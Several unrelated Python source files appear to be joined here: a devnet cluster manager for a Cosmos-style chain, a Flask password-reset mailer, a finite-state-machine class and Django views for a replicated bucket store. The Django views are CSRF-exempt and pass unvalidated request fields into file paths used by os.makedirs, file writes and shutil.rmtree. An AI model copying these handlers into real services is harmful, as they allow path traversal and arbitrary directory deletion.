i = self.nodes_len()
# default configs
if base_port is None:
# use the node0's base_port + i * 10 as default base port for new ndoe
base_port = self.config["validators"][0]["base_port"] + i * 10
if moniker is None:
moniker = f"node{i}"
# add config
assert len(self.config["validators"]) == i
self.config["validators"].append(
{
"base_port": base_port,
"hostname": hostname,
"moniker": moniker,
}
)
(self.data_dir / "config.json").write_text(json.dumps(self.config))
# init home directory
self.init(i)
home = self.home(i)
(home / "config/genesis.json").unlink()
(home / "config/genesis.json").symlink_to("../../genesis.json")
# use p2p peers from node0's config
node0 = tomlkit.parse((self.data_dir / "node0/config/config.toml").read_text())
def custom_edit_tm(doc):
if statesync:
info = self.status()["sync_info"]
doc["statesync"].update(
{
"enable": True,
"rpc_servers": ",".join(self.node_rpc(i) for i in range(2)),
"trust_height": int(info["earliest_block_height"]),
"trust_hash": info["earliest_block_hash"],
"temp_dir": str(self.data_dir),
"discovery_time": "5s",
}
)
edit_tm_cfg(
home / "config/config.toml",
base_port,
node0["p2p"]["persistent_peers"],
custom_edit=custom_edit_tm,
)
edit_app_cfg(home / "config/app.toml", base_port)
# create validator account
self.create_account("validator", i)
# add process config into supervisor
path = self.data_dir / SUPERVISOR_CONFIG_FILE
ini = configparser.RawConfigParser()
ini.read_file(path.open())
chain_id = self.config["chain_id"]
prgname = f"{chain_id}-node{i}"
section = f"program:{prgname}"
ini.add_section(section)
ini[section].update(
dict(
COMMON_PROG_OPTIONS,
command=f"{self.raw.cmd} start --home %(here)s/node{i}",
autostart="false",
stdout_logfile=f"%(here)s/node{i}.log",
)
)
with path.open("w") as fp:
ini.write(fp)
self.reload_supervisor()
return i
def home(self, i):
"home directory of i-th node"
return home_dir(self.data_dir, i)
def base_port(self, i):
return self.config["validators"][i]["base_port"]
def node_rpc(self, i):
"rpc url of i-th node"
return "tcp://127.0.0.1:%d" % ports.rpc_port(self.base_port(i))
# for query
def ipport_grpc(self, i):
"grpc url of i-th node"
return "127.0.0.1:%d" % ports.grpc_port(self.base_port(i))
# tx broadcast only
def ipport_grpc_tx(self, i):
"grpc url of i-th node"
return "127.0.0.1:%d" % ports.grpc_port_tx_only(self.base_port(i))
def node_id(self, i):
"get i-th node's tendermint node id"
output = self.raw("tendermint", "show-node-id", home=self.home(i))
return output.decode().strip()
def create_account(self, name, i=0, mnemonic=None):
"create new keypair in i-th node's keyring"
if mnemonic is None:
output = self.raw(
"keys",
"add",
name,
home=self.home(i),
output="json",
keyring_backend="test",
)
else:
output = self.raw(
"keys",
"add",
name,
"--recover",
home=self.home(i),
output="json",
keyring_backend="test",
stdin=mnemonic.encode() + b"\n",
)
return json.loads(output)
def create_account_ledger(self, name, i=0):
"create new ledger keypair"
def send_request():
try:
self.output = self.raw(
"keys",
"add",
name,
"--ledger",
home=self.home(i),
output="json",
keyring_backend="test",
)
except Exception as e:
self.error = e
t = threading.Thread(target=send_request)
t.start()
time.sleep(3)
for _ in range(0, 3):
self.leger_button.press_right()
time.sleep(0.2)
self.leger_button.press_both()
t.join()
if self.error:
raise self.error
return json.loads(self.output)
def init(self, i):
"the i-th node's config is already added"
return self.raw(
"init",
self.config["validators"][i]["moniker"],
chain_id=self.chain_id,
home=self.home(i),
)
def validate_genesis(self, i=0):
return self.raw("validate-genesis", home=self.home(i))
def add_genesis_account(self, addr, coins, i=0, **kwargs):
return self.raw(
"add-genesis-account",
addr,
coins,
home=self.home(i),
output="json",
**kwargs,
)
def gentx(self, name, coins, i, min_self_delegation=1):
return self.raw(
"gentx",
name,
amount=coins,
min_self_delegation=str(min_self_delegation),
home=self.home(i),
chain_id=self.chain_id,
keyring_backend="test",
)
def collect_gentxs(self, gentx_dir, i=0):
return self.raw("collect-gentxs", gentx_dir, home=self.home(i))
def status(self, i=0):
return json.loads(self.raw("status", node=self.node_rpc(i)))
def block_height(self, i=0):
return int(self.status(i)["sync_info"]["latest_block_height"])
def block_time(self, i=0):
return isoparse(self.status(i)["sync_info"]["latest_block_time"])
def balance(self, addr, i=0):
coin = json.loads(
self.raw(
"query", "bank", "balances", addr, output="json", node=self.node_rpc(i)
)
)["balances"]
if len(coin) == 0:
return 0
coin = coin[0]
assert coin["denom"] == "basecro"
return int(coin["amount"])
def distribution_commision(self, addr, i=0):
coin = json.loads(
self.raw(
"query",
"distribution",
"commission",
addr,
output="json",
node=self.node_rpc(i),
)
)["commission"][0]
return float(coin["amount"])
def distribution_community(self, i=0):
coin = json.loads(
self.raw(
"query",
"distribution",
"community-pool",
output="json",
node=self.node_rpc(i),
)
)["pool"][0]
return float(coin["amount"])
def distribution_reward(self, delegator_addr, i=0):
coin = json.loads(
self.raw(
"query",
"distribution",
"rewards",
delegator_addr,
output="json",
node=self.node_rpc(i),
)
)["total"][0]
return float(coin["amount"])
def address(self, name, i=0, bech="acc"):
output = self.raw(
"keys",
"show",
name,
"-a",
home=self.home(i),
keyring_backend="test",
bech=bech,
)
return output.strip().decode()
@format_doc_string(
options=",".join(v.value for v in ModuleAccount.__members__.values())
)
def module_address(self, name):
"""
get address of module accounts
:param name: name of module account, values: {options}
"""
data = hashlib.sha256(ModuleAccount(name).value.encode()).digest()[:20]
return bech32.bech32_encode("cro", bech32.convertbits(data, 8, 5))
def account(self, addr, i=0):
return json.loads(
self.raw(
"query", "auth", "account", addr, output="json", node=self.node_rpc(i)
)
)
def supply(self, supply_type):
return json.loads(
self.raw(
"query", "supply", supply_type, output="json", node=self.node_rpc(0)
)
)
def validator(self, addr, i=0):
return json.loads(
self.raw(
"query",
"staking",
"validator",
addr,
output="json",
node=self.node_rpc(i),
)
)
def validators(self, i=0):
return json.loads(
self.raw(
"query", "staking", "validators", output="json", node=self.node_rpc(i)
)
)["validators"]
def staking_pool(self, bonded=True):
return int(
json.loads(
self.raw(
"query", "staking", "pool", output="json", node=self.node_rpc(0)
)
)["bonded_tokens" if bonded else "not_bonded_tokens"]
)
def transfer(self, from_, to, coins, i=0, generate_only=False, fees=None):
return json.loads(
self.raw(
"tx",
"bank",
"send",
from_,
to,
coins,
"-y",
"--generate-only" if generate_only else None,
home=self.home(i),
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
fees=fees,
)
)
def transfer_from_ledger(
self, from_, to, coins, i=0, generate_only=False, fees=None
):
def send_request():
try:
self.output = self.raw(
"tx",
"bank",
"send",
from_,
to,
coins,
"-y",
"--generate-only" if generate_only else "",
"--ledger",
home=self.home(i),
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
fees=fees,
sign_mode="amino-json",
)
except Exception as e:
self.error = e
t = threading.Thread(target=send_request)
t.start()
time.sleep(3)
for _ in range(0, 11):
self.leger_button.press_right()
time.sleep(0.4)
self.leger_button.press_both()
t.join()
if self.error:
raise self.error
return json.loads(self.output)
def get_delegated_amount(self, which_addr, i=0):
return json.loads(
self.raw(
"query",
"staking",
"delegations",
which_addr,
home=self.home(i),
chain_id=self.chain_id,
node=self.node_rpc(0),
output="json",
)
)
def delegate_amount(self, to_addr, amount, from_addr, i=0):
return json.loads(
self.raw(
"tx",
"staking",
"delegate",
to_addr,
amount,
"-y",
home=self.home(i),
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
# to_addr: croclcl1... , from_addr: cro1...
def unbond_amount(self, to_addr, amount, from_addr, i=0):
return json.loads(
self.raw(
"tx",
"staking",
"unbond",
to_addr,
amount,
"-y",
home=self.home(i),
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
# to_validator_addr: crocncl1... , from_from_validator_addraddr: crocl1...
def redelegate_amount(
self, to_validator_addr, from_validator_addr, amount, from_addr, i=0
):
return json.loads(
self.raw(
"tx",
"staking",
"redelegate",
from_validator_addr,
to_validator_addr,
amount,
"-y",
home=self.home(i),
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
def make_multisig(self, name, signer1, signer2, i=0):
self.raw(
"keys",
"add",
name,
multisig=f"{signer1},{signer2}",
multisig_threshold="2",
home=self.home(i),
keyring_backend="test",
output="json",
)
def sign_multisig_tx(self, tx_file, multi_addr, signer_name, i=0):
return json.loads(
self.raw(
"tx",
"sign",
tx_file,
from_=signer_name,
multisig=multi_addr,
home=self.home(i),
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
def encode_signed_tx(self, signed_tx):
return self.raw(
"tx",
"encode",
signed_tx,
)
def sign_single_tx(self, tx_file, signer_name, i=0):
return json.loads(
self.raw(
"tx",
"sign",
tx_file,
from_=signer_name,
home=self.home(i),
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
def combine_multisig_tx(self, tx_file, multi_name, signer1_file, signer2_file, i=0):
return json.loads(
self.raw(
"tx",
"multisign",
tx_file,
multi_name,
signer1_file,
signer2_file,
home=self.home(i),
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc(0),
)
)
def broadcast_tx(self, tx_file, i=0):
return json.loads(self.raw("tx", "broadcast", tx_file, node=self.node_rpc(i)))
def unjail(self, addr, i=0):
return json.loads(
self.raw(
"tx",
"slashing",
"unjail",
"-y",
from_=addr,
home=self.home(i),
node=self.node_rpc(i),
keyring_backend="test",
chain_id=self.chain_id,
)
)
def create_validator(
self,
amount,
i,
moniker=None,
commission_max_change_rate="0.01",
commission_rate="0.1",
commission_max_rate="0.2",
min_self_delegation="1",
identity="",
website="",
security_contact="",
details="",
):
"""MsgCreateValidator
create the node with create_node before call this"""
pubkey = (
self.raw("tendermint", "show-validator", home=self.home(i)).strip().decode()
)
return json.loads(
self.raw(
"tx",
"staking",
"create-validator",
"-y",
from_=self.address("validator", i),
amount=amount,
pubkey=pubkey,
min_self_delegation=min_self_delegation,
# commision
commission_rate=commission_rate,
commission_max_rate=commission_max_rate,
commission_max_change_rate=commission_max_change_rate,
# description
moniker=moniker or self.config["validators"][i]["moniker"],
identity=identity,
website=website,
security_contact=security_contact,
details=details,
# basic
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
def edit_validator(
self,
i,
commission_rate=None,
moniker=None,
identity=None,
website=None,
security_contact=None,
details=None,
):
"""MsgEditValidator"""
options = dict(
commission_rate=commission_rate,
# description
moniker=moniker,
identity=identity,
website=website,
security_contact=security_contact,
details=details,
)
return json.loads(
self.raw(
"tx",
"staking",
"edit-validator",
"-y",
from_=self.address("validator", i),
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
**{k: v for k, v in options.items() if v is not None},
)
)
def gov_propose(self, proposor, kind, proposal, i=0):
if kind == "software-upgrade":
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
proposal["name"],
"-y",
from_=proposor,
# content
title=proposal.get("title"),
description=proposal.get("description"),
upgrade_height=proposal.get("upgrade-height"),
upgrade_time=proposal.get("upgrade-time"),
upgrade_info=proposal.get("upgrade-info"),
deposit=proposal.get("deposit"),
# basic
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
elif kind == "cancel-software-upgrade":
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
"-y",
from_=proposor,
# content
title=proposal.get("title"),
description=proposal.get("description"),
deposit=proposal.get("deposit"),
# basic
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
else:
with tempfile.NamedTemporaryFile("w") as fp:
json.dump(proposal, fp)
fp.flush()
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
fp.name,
"-y",
from_=proposor,
# basic
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
def gov_vote(self, voter, proposal_id, option, i=0):
return json.loads(
self.raw(
"tx",
"gov",
"vote",
proposal_id,
option,
"-y",
from_=voter,
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
def gov_deposit(self, depositor, proposal_id, amount, i=0):
return json.loads(
self.raw(
"tx",
"gov",
"deposit",
proposal_id,
amount,
"-y",
from_=depositor,
home=self.home(i),
node=self.node_rpc(0),
keyring_backend="test",
chain_id=self.chain_id,
)
)
def query_proposals(self, depositor=None, limit=None, status=None, voter=None):
return json.loads(
self.raw(
"query",
"gov",
"proposals",
depositor=depositor,
count_total=limit,
status=status,
voter=voter,
output="json",
node=self.node_rpc(0),
)
)
def query_proposal(self, proposal_id):
return json.loads(
self.raw(
"query",
"gov",
"proposal",
proposal_id,
output="json",
node=self.node_rpc(0),
)
)
def query_tally(self, proposal_id):
return json.loads(
self.raw(
"query",
"gov",
"tally",
proposal_id,
output="json",
node=self.node_rpc(0),
)
)
def ibc_transfer(
self,
from_,
to,
amount,
channel, # src channel
target_version, # chain version number of target chain
i=0,
):
return json.loads(
self.raw(
"tx",
"ibc-transfer",
"transfer",
"transfer", # src port
channel,
to,
amount,
"-y",
# FIXME https://github.com/cosmos/cosmos-sdk/issues/8059
"--absolute-timeouts",
from_=from_,
home=self.home(i),
node=self.node_rpc(i),
keyring_backend="test",
chain_id=self.chain_id,
packet_timeout_height=f"{target_version}-10000000000",
packet_timeout_timestamp=0,
)
)
def start_cluster(data_dir):
cmd = [
sys.executable,
"-msupervisor.supervisord",
"-c",
data_dir / SUPERVISOR_CONFIG_FILE,
]
return subprocess.Popen(cmd, env=dict(os.environ, PYTHONPATH=":".join(sys.path)))
class TailLogsThread(threading.Thread):
def __init__(self, base_dir, pats: List[str]):
self.base_dir = base_dir
self.tailer = multitail2.MultiTail([str(base_dir / pat) for pat in pats])
self._stop_event = threading.Event()
super().__init__()
def run(self):
while not self.stopped:
for (path, _), s in self.tailer.poll():
print(Path(path).relative_to(self.base_dir), s)
# TODO Replace this with FAM/inotify for watching filesystem events.
time.sleep(0.5)
def stop(self):
self._stop_event.set()
@property
def stopped(self):
return self._stop_event.is_set()
def start_tail_logs_thread(data_dir):
t = TailLogsThread(data_dir, ["*/node*.log", "relayer-*.log"])
t.start()
return t
def process_config(config, base_port):
"""
fill default values in config
"""
for i, val in enumerate(config["validators"]):
if "moniker" not in val:
val["moniker"] = f"node{i}"
if "base_port" not in val:
val["base_port"] = base_port + i * 10
if "hostname" not in val:
val["hostname"] = "localhost"
def init_devnet(
data_dir,
config,
base_port,
image=IMAGE,
cmd=None,
gen_compose_file=False,
):
"""
init data directory
"""
def create_account(cli, account, use_ledger=False):
if use_ledger:
acct = cli.create_account_ledger(account["name"])
else:
acct = cli.create_account(account["name"])
vesting = account.get("vesting")
if not vesting:
cli.add_genesis_account(acct["address"], account["coins"])
else:
genesis_time = isoparse(genesis["genesis_time"])
end_time = genesis_time + datetime.timedelta(
seconds=durations.Duration(vesting).to_seconds()
)
vend = int(end_time.timestamp())
cli.add_genesis_account(
acct["address"],
account["coins"],
vesting_amount=account["coins"],
vesting_end_time=vend,
)
return acct
process_config(config, base_port)
(data_dir / "config.json").write_text(json.dumps(config))
cmd = cmd or CHAIN
# init home directories
for i, val in enumerate(config["validators"]):
ChainCommand(cmd)(
"init",
val["moniker"],
chain_id=config["chain_id"],
home=home_dir(data_dir, i),
)
if "consensus_key" in val:
# restore consensus private key
with (home_dir(data_dir, i) / "config/priv_validator_key.json").open(
"w"
) as fp:
json.dump(
{
"address": hashlib.sha256(
base64.b64decode(val["consensus_key"]["pub"])
)
.hexdigest()[:40]
.upper(),
"pub_key": {
"type": "tendermint/PubKeyEd25519",
"value": val["consensus_key"]["pub"],
},
"priv_key": {
"type": "tendermint/PrivKeyEd25519",
"value": val["consensus_key"]["priv"],
},
},
fp,
)
if "genesis_file" in config:
genesis_bytes = open(
config["genesis_file"] % {"here": Path(config["path"]).parent}, "rb"
).read()
else:
genesis_bytes = (data_dir / "node0/config/genesis.json").read_bytes()
(data_dir / "genesis.json").write_bytes(genesis_bytes)
(data_dir / "gentx").mkdir()
for i in range(len(config["validators"])):
try:
(data_dir / f"node{i}/config/genesis.json").unlink()
except OSError:
pass
(data_dir / f"node{i}/config/genesis.json").symlink_to("../../genesis.json")
(data_dir / f"node{i}/config/gentx").symlink_to("../../gentx")
# now we can create ClusterCLI
cli = ClusterCLI(data_dir.parent, config["chain_id"], cmd)
# patch the genesis file
genesis = jsonmerge.merge(
json.load(open(data_dir / "genesis.json")),
config.get("genesis", {}),
)
(data_dir / "genesis.json").write_text(json.dumps(genesis))
cli.validate_genesis()
# create accounts
accounts = []
for i, node in enumerate(config["validators"]):
mnemonic = node.get("mnemonic")
account = cli.create_account("validator", i, mnemonic=mnemonic)
accounts.append(account)
if "coins" in node:
cli.add_genesis_account(account["address"], node["coins"], i)
if "staked" in node:
cli.gentx(
"validator",
node["staked"],
i,
min_self_delegation=node.get("min_self_delegation", 1),
)
# create accounts
for account in config.get("accounts", []):
account = create_account(cli, account)
accounts.append(account)
account_hw = config.get("hw_account")
if account_hw:
account = create_account(cli, account_hw, True)
accounts.append(account)
# output accounts
(data_dir / "accounts.json").write_text(json.dumps(accounts))
# collect-gentxs if directory not empty
if next((data_dir / "gentx").iterdir(), None) is not None:
cli.collect_gentxs(data_dir / "gentx", 0)
# realise the symbolic links, so the node directories can be used independently
genesis_bytes = (data_dir / "genesis.json").read_bytes()
for i in range(len(config["validators"])):
(data_dir / f"node{i}/config/gentx").unlink()
tmp = data_dir / f"node{i}/config/genesis.json"
tmp.unlink()
tmp.write_bytes(genesis_bytes)
# write tendermint config
peers = config.get("peers") or ",".join(
[
"tcp://%s@%s:%d"
% (cli.node_id(i), val["hostname"], ports.p2p_port(val["base_port"]))
for i, val in enumerate(config["validators"])
]
)
for i, val in enumerate(config["validators"]):
edit_tm_cfg(data_dir / f"node{i}/config/config.toml", val["base_port"], peers)
edit_app_cfg(data_dir / f"node{i}/config/app.toml", val["base_port"])
# write supervisord config file
with (data_dir / SUPERVISOR_CONFIG_FILE).open("w") as fp:
write_ini(fp, supervisord_ini(cmd, config["validators"], config["chain_id"]))
if gen_compose_file:
yaml.dump(
docker_compose_yml(cmd, config["validators"], data_dir, image),
(data_dir / "docker-compose.yml").open("w"),
)
def relayer_chain_config(data_dir, chain_id):
cfg = json.load((data_dir / chain_id / "config.json").open())
rpc_port = ports.rpc_port(cfg["validators"][0]["base_port"])
return {
"key": "relayer",
"chain-id": chain_id,
# rpc address of first node
"rpc-addr": f"http://localhost:{rpc_port}",
"account-prefix": "cro",
"gas-adjustment": 1.5,
"gas-prices": "0.0basecro",
"trusting-period": "336h",
"debug": True,
}
def init_cluster(
data_dir, config_path, base_port, image=IMAGE, cmd=None, gen_compose_file=False
):
config = yaml.safe_load(open(config_path))
# override relayer config in config.yaml
rly_section = config.pop("relayer", {})
for chain_id, cfg in config.items():
cfg["path"] = str(config_path)
cfg["chain_id"] = chain_id
chains = list(config.values())
for chain in chains:
(data_dir / chain["chain_id"]).mkdir()
init_devnet(
data_dir / chain["chain_id"], chain, base_port, image, cmd, gen_compose_file
)
with (data_dir / SUPERVISOR_CONFIG_FILE).open("w") as fp:
write_ini(
fp,
supervisord_ini_group(
config.keys(), list(rly_section.get("paths", {}).keys())
),
)
if len(chains) > 1:
# write relayer config
rly_home = data_dir / "relayer"
rly_home.mkdir()
rly_cfg = rly_home / "config/config.yaml"
rly_cfg.parent.mkdir()
rly_section["chains"] = [
relayer_chain_config(data_dir, chain_id) for chain_id in config
]
with rly_cfg.open("w") as fp:
yaml.dump(rly_section, fp)
# restore the relayer account in relayer
for chain in chains:
mnemonic = find_account(data_dir, chain["chain_id"], "relayer")["mnemonic"]
subprocess.run(
[
"relayer",
"--home",
rly_home,
"keys",
"restore",
chain["chain_id"],
"relayer",
mnemonic,
"--coin-type",
"394", # mainnet cro
],
check=True,
)
def find_account(data_dir, chain_id, name):
accounts = json.load((data_dir / chain_id / "accounts.json").open())
return next(acct for acct in accounts if acct["name"] == name)
def supervisord_ini(cmd, validators, chain_id):
ini = {}
for i, node in enumerate(validators):
ini[f"program:{chain_id}-node{i}"] = dict(
COMMON_PROG_OPTIONS,
command=f"{cmd} start --home %(here)s/node{i}",
stdout_logfile=f"%(here)s/node{i}.log",
)
return ini
def supervisord_ini_group(chain_ids, paths):
cfg = {
"include": {
"files": " ".join(
f"%(here)s/{chain_id}/tasks.ini" for chain_id in chain_ids
)
},
"supervisord": {
"pidfile": "%(here)s/supervisord.pid",
"nodaemon": "true",
"logfile": "/dev/null",
"logfile_maxbytes": "0",
},
"rpcinterface:supervisor": {
"supervisor.rpcinterface_factory": "supervisor.rpcinterface:"
"make_main_rpcinterface",
},
"unix_http_server": {"file": "%(here)s/supervisor.sock"},
"supervisorctl": {"serverurl": "unix://%(here)s/supervisor.sock"},
}
for path in paths:
cfg[f"program:relayer-{path}"] = dict(
COMMON_PROG_OPTIONS,
command=f"relayer --home %(here)s/relayer tx link-then-start {path}",
stdout_logfile=f"%(here)s/relayer-{path}.log",
)
return cfg
def docker_compose_yml(cmd, validators, data_dir, image):
return {
"version": "3",
"services": {
f"node{i}": {
"image": image,
"command": "chaind start",
"volumes": [f"{data_dir.absolute() / f'node{i}'}:/.chain-maind:Z"],
}
for i, val in enumerate(validators)
},
}
def edit_tm_cfg(path, base_port, peers, *, custom_edit=None):
doc = tomlkit.parse(open(path).read())
# tendermint is start in process, not needed
# doc['proxy_app'] = 'tcp://127.0.0.1:%d' % abci_port(base_port)
doc["rpc"]["laddr"] = "tcp://0.0.0.0:%d" % ports.rpc_port(base_port)
doc["rpc"]["pprof_laddr"] = "localhost:%d" % ports.pprof_port(base_port)
doc["rpc"]["grpc_laddr"] = "tcp://0.0.0.0:%d" % ports.grpc_port_tx_only(base_port)
doc["p2p"]["laddr"] = "tcp://0.0.0.0:%d" % ports.p2p_port(base_port)
doc["p2p"]["persistent_peers"] = peers
doc["p2p"]["addr_book_strict"] = False
doc["p2p"]["allow_duplicate_ip"] = True
doc["consensus"]["timeout_commit"] = "1s"
doc["rpc"]["timeout_broadcast_tx_commit"] = "30s"
if custom_edit is not None:
custom_edit(doc)
open(path, "w").write(tomlkit.dumps(doc))
def edit_app_cfg(path, base_port):
doc = tomlkit.parse(open(path).read())
# enable api server
doc["api"]["enable"] = True
doc["api"]["swagger"] = True
doc["api"]["enabled-unsafe-cors"] = True
doc["api"]["address"] = "tcp://0.0.0.0:%d" % ports.api_port(base_port)
doc["grpc"]["address"] = "0.0.0.0:%d" % ports.grpc_port(base_port)
# take snapshot for statesync
doc["pruning"] = "nothing"
doc["state-sync"]["snapshot-interval"] = 5
doc["state-sync"]["snapshot-keep-recent"] = 10
open(path, "w").write(tomlkit.dumps(doc))
if __name__ == "__main__":
interact("rm -r data; mkdir data", ignore_error=True)
data_dir = Path("data")
init_cluster(data_dir, "config.yaml", 26650)
supervisord = start_cluster(data_dir)
t = start_tail_logs_thread(data_dir)
supervisord.wait()
t.stop()
t.join()
|
email.py
|
from flask_mail import Message
from app import mail, app
from flask import render_template
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_mail('[Бложик] Сброс пароля', sender=app.config['ADMINS'][0], recipients=[user.email],
text_body=render_template('email/reset_password.txt', user=user, token=token),
html_body=render_template('email/reset_password.html', user=user, token=token))
|
__State.py
|
from multiprocessing import Process
from .base import Base
'''
The base State class.
Code running in a State may be stopped at anytime.
'''
class State(Base):
'''
name: the name of the State used in logging
fsm: the FSM object the State is associated with
'''
def __init__(self, name, fsm, add_to_fsm=True):
super(State, self).__init__("State", name)
if fsm == None:
self.logfatal("fsm is not set")
self.__fsm = fsm
self.__transitions = set()
if add_to_fsm:
fsm._FSM__add_state(self)
# Defines the link between a Transition the State. The State may have may Transitions.
def add_transition(self, transition):
if transition._Transition__fsm != self.__fsm:
self.logfatal("transition is for a different fsm")
for t in self.__transitions:
if t._Transition__watcher == transition._Transition__watcher:
self.logfatal("watcher already used in this state")
self.__transitions.add(transition)
### Overridable methods ###
'''
Code to be run when the State is started.
Use this function for initialisation.
'''
def start(self):
self.logdebug("started")
'''
Code to be run when the State is stopped.
'''
def stop(self):
self.logdebug("stopped")
'''
Code to be run on an itteration of the FSM's main loop.
Similar to MAVProxy's 'idle_task' function in a module.
'''
def loop(self):
pass
### / Overridable methods ###
def __load_transistions(self):
for t in self.__transitions:
t._Transition__load()
def __unload_transistions(self):
for t in self.__transitions:
t._Transition__unload()
def __loop(self):
self.loop()
next_state = None
for t in self.__transitions:
res = t._Transition__loop()
if res != None:
next_state = res
return next_state
'''
A subclass of State for applications requring asynchronous execution.
Code running in a StateAsync may be stopped at anytime.
'''
class StateAsync(State):
'''
name: the name of the State used in logging
fsm: the FSM object the State is associated with
target: the function to be called asynchronously. No arguments are passes to 'target' on execution.
'''
def __init__(self, name, fsm, target):
super(StateAsync, self).__init__(name, fsm)
if not callable(target):
self.logfatal("target is not callable")
self.__target = target
self.__process = None
### Method Overrides ###
def start(self):
self.__process = Process(target=self.__target)
self.__process.start()
self.logdebug("started")
def stop(self):
self.__process.terminate()
self.__process.join(None)
self.__process = None
self.logdebug("stopped")
### / Method Overrides ###
|
views.py
|
import os
import shutil
import threading
import mimetypes
from IPython import embed
from .models import Bucket, File
from django.views.generic import TemplateView
from cloud.settings import ARCHIVE_DIR, NODE_NAME
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse, HttpResponseBadRequest, JsonResponse, HttpResponseNotFound
from .helper import replicateBucket, hinted_handoff, replicateDelete, replicateFile, \
replicateDeleteFile, replicateUpdateFile
# Create your views here.
class ServerStatus(TemplateView):
def get(self, request):
return HttpResponse('OK')
@method_decorator(csrf_exempt, name='dispatch')
class CreateBucket(TemplateView):
def post(self, request):
name = request.POST.get('name')
path = os.path.join(ARCHIVE_DIR, name)
result = ""
buckets = Bucket.objects.filter(name=name)
count = 0
if len(buckets) == 0:
os.makedirs(path)
bucket = Bucket(name=name)
bucket.save()
result = "Bucket Creation Successful"
count += 1
else:
bucket = Bucket.objects.get(name=name)
result = "Bucket already exists"
count += replicateBucket(name)
data = {'result': result, 'count': count}
return JsonResponse(data)
@method_decorator(csrf_exempt, name='dispatch')
class DeleteBucket(TemplateView):
def post(self, request):
name = request.POST.get('name')
path = os.path.join(ARCHIVE_DIR, name)
result = ""
buckets = Bucket.objects.filter(name=name)
count = 0
if len(buckets) == 0:
result = "Bucket doesn't exist"
else:
shutil.rmtree(path)
bucket = Bucket.objects.get(name=name)
bucket.delete()
result = 'Bucket Deleted Successfully'
count += 1
count += replicateDelete(name)
data = {'result': result, 'count': count}
return JsonResponse(data)
@method_decorator(csrf_exempt, name='dispatch')
class ReplicateBucket(TemplateView):
def post(self, request):
name = request.POST.get('name')
path = os.path.join(ARCHIVE_DIR, name)
result = ""
buckets = Bucket.objects.filter(name=name)
if len(buckets) == 0:
os.makedirs(path)
bucket = Bucket(name=name)
bucket.save()
result = "Bucket Creation Successful"
return HttpResponse(result)
return HttpResponseBadRequest('Bucket already exists')
@method_decorator(csrf_exempt, name='dispatch')
class ReplicateDelete(TemplateView):
def post(self, request):
name = request.POST.get('name')
path = os.path.join(ARCHIVE_DIR, name)
result = ""
buckets = Bucket.objects.filter(name=name)
if len(buckets) > 0:
shutil.rmtree(path)
bucket = Bucket.objects.get(name=name)
bucket.delete()
result = "Bucket delete successful"
return HttpResponse(result)
return HttpResponseBadRequest("Bucket doesn't exist")
@method_decorator(csrf_exempt, name='dispatch')
class HandleAlive(TemplateView):
def post(self, request):
node = request.POST.get('node')
stopper = threading.Event()
x = threading.Thread(target=hinted_handoff, args=(node, stopper), daemon=True)
x.start()
return HttpResponse('OK')
@method_decorator(csrf_exempt, name='dispatch')
class CreateFile(TemplateView):
def post(self, request):
file = request.FILES['file']
name = request.POST['name']
bucket = request.POST['bucket']
path = os.path.join(ARCHIVE_DIR, bucket, name)
files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
count = 0
result = ''
clocks = {}
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
result = 'No such bucket exists'
elif len(files) > 0:
result = 'File already exists. Please use "/update/filename" API to update it.'
else:
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File(version=1, name=name, bucket=bucket_model)
file_model.save()
clocks = {NODE_NAME: file_model.version}
result = 'File Creation Successful'
count += 1
rep_count, rep_clocks = replicateFile(name, bucket, file)
print(rep_count, rep_clocks)
count += rep_count
clocks = {**clocks, **rep_clocks}
data = {'result': result, 'count': count, 'vector_clocks': clocks}
return JsonResponse(data)
@method_decorator(csrf_exempt, name='dispatch')
class ReplicateFile(TemplateView):
def post(self, request):
file = request.FILES['file']
name = request.POST.get('name')
bucket = request.POST.get('bucket')
path = os.path.join(ARCHIVE_DIR, bucket, name)
files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
return HttpResponseBadRequest('No such bucket exists')
elif len(files) > 0:
return HttpResponseBadRequest('File already exists. Please use "/update/filename" API to update it.')
else:
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File(version=1, name=name, bucket=bucket_model)
file_model.save()
result = {'vector': file_model.version, 'status': 'File Creation Successful'}
return JsonResponse(result)
@method_decorator(csrf_exempt, name='dispatch')
class DeleteFile(TemplateView):
def post(self, request):
name = request.POST['name']
bucket = request.POST['bucket']
path = os.path.join(ARCHIVE_DIR, bucket, name)
